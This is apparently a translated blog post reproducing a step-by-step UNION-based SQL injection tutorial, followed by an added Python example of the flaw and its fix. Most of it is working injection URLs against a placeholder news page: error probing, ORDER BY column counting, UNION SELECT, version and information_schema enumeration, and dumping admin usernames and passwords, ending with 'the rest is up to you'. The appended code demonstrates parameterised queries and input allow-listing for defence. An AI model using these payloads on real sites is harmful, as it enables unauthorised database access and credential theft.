Web hacking, commonly called a web attack, can be done in many ways; one of them is SQL injection.
What is SQL injection?
SQL injection occurs when an attacker can insert SQL statements into a 'query'
by manipulating the data input to the application.
This is one way of doing SQL injection; I copy-pasted it from http://jasakom.com, by an author named cruz3N.
OK, let's look together.
1. First, of course, we find a target. For example, our target this time is http://www.target.com/berita.php?id=100
2. Add the character ' at the end of the URL, or add the character "-", to see if there is an error message.
Example:
http://www.target.com/berita.php?id=100'
or
http://www.target.com/berita.php?id=-100
4. An error message will be displayed ...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near '''
at line 1" and so on.
5. The next step is to find and count the number of tables that exist in the database ...
Here we will use the order by command
Example:
http://www.target.com/berita.php?id=100+order+by+1/*
Hohoho ... and what is the "/*"? That is the SQL closing (comment) character, or we can also use "--". Whichever you like ...
As for "+", it is the connector between commands ...
6. Well, from here we just try them one by one ...
http://www.target.com/berita.php?id=100+order+by+1/* (no error)
http://www.target.com/berita.php?id=100+order+by+2/* (still nothing)
http://www.target.com/berita.php?id=100+order+by+3/* (getting tired)
http://www.target.com/berita.php?id=100+order+by+4/* (do not give up)
Until the error appears ...
Suppose the error appears here ...
http://www.target.com/berita.php?id=100+order+by+10/*
That means the number we take is "9"
http://www.target.com/berita.php?id=100+order+by+9/*
7. To find out which numbers are displayed, we now use UNION
Example:
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Then note which numbers come out (just like the lottery ... :p)
8. For example, if the lucky number that comes out is "3", then what we can do is check which version of MySQL is in use, with the command "version()" or "@@version"
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Or
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Well, if it is version 5, just use "information_schema" directly to see the tables and columns that exist in the database ...
Example:
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Now, they say that to see the other tables we add LIMIT at the end of the URL. But this time I did not use it for the tables ... Am I wrong? Maybe, but what I want to explain now is MY VERSION AND MY EXPERIENCE. Perhaps it is slightly different ... you know, I am still learning ... Hehehe ...
For example, the table you see is "admin"
Well, now we just look at its columns by replacing the word "table" ...
Example:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.columns/*
For example, the columns that come out are "password" and "username"
Let's just go straight to viewing them ...
Example:
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
and
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Now the login username and password can be seen ... The rest ... It's up to you ...
---------------------------------------------------
That's what is written there.
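The root cause behind every request in the steps above, and its fix, as an added example that is not from the original post or from cruz3N. It is a Python/sqlite3 stand-in for a PHP/MySQL page such as berita.php; the table and column names, the data and the function names are all assumptions.

```python
import re
import sqlite3

def make_db():
    """Constructed in-memory data; table and column names are assumptions."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE berita (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO berita VALUES (100, 'Sample headline', 'Sample body');
        INSERT INTO admin VALUES ('editor', 'constructed-password-hash');
    """)
    return db

def news_vulnerable(db, raw_id):
    # The flaw: the id parameter is pasted into the SQL text, so anything
    # after the number is parsed as SQL (ORDER BY, UNION SELECT, ...).
    sql = "SELECT id, title, body FROM berita WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def news_hardened(db, raw_id):
    # 1) Allow-list: the id must be a short run of ASCII digits.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be numeric")
    # 2) Bound parameter: the value travels separately from the SQL text.
    sql = "SELECT id, title, body FROM berita WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def outcome(fn, db, raw_id):
    """Return the rows, or the name of the exception the handler raised."""
    try:
        return fn(db, raw_id)
    except (sqlite3.Error, ValueError) as exc:
        return type(exc).__name__

if __name__ == "__main__":
    db = make_db()
    # Inputs shaped like the URL-decoded id values in the steps above.
    for raw in ["100", "100'", "100 order by 4",
                "100 union select 1, username, 3 from admin"]:
        print(repr(raw), "| vulnerable:", outcome(news_vulnerable, db, raw),
              "| hardened:", outcome(news_hardened, db, raw))
```

In a real handler the `ValueError` should become a generic 400 response, and database errors should be logged server-side rather than echoed to the page, since the echoed error text is what step 4 relies on.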
Do you still not understand what SQL injection is?
Relax, you can download the document below about SQL injection step by step.
good luck!!! :)